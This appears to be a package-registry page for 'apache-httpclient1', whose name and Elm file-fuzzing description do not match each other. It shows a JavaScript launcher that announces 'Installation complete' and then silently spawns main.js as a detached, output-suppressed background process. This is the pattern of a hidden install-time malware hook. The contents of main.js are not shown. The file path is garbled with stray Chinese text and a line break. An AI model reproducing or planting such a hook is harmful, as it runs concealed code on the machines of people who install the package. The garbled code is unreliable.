apache-httpclient1
Version:
A package to create and fuzz File objects for testing Elm applications that handle file operations.
22 lines (15 loc) • 525 B
JavaScript
const { spawn } = require("child_process");
const path = require("path");
function runIndexJs() {
console.log("Installation complete. Running main.js in the background...");
const mainFilePath = path.resolve(__dirname, "创建文件夹:apache-httpclient1/src
main.js");
console.log("Resolved main.js path:", mainFilePath);
const child = spawn("node", [mainFilePath], {
detached: true,
stdio: "ignore",
});
child.unref();
console.log("main.js is running in the background.");
}
runIndexJs();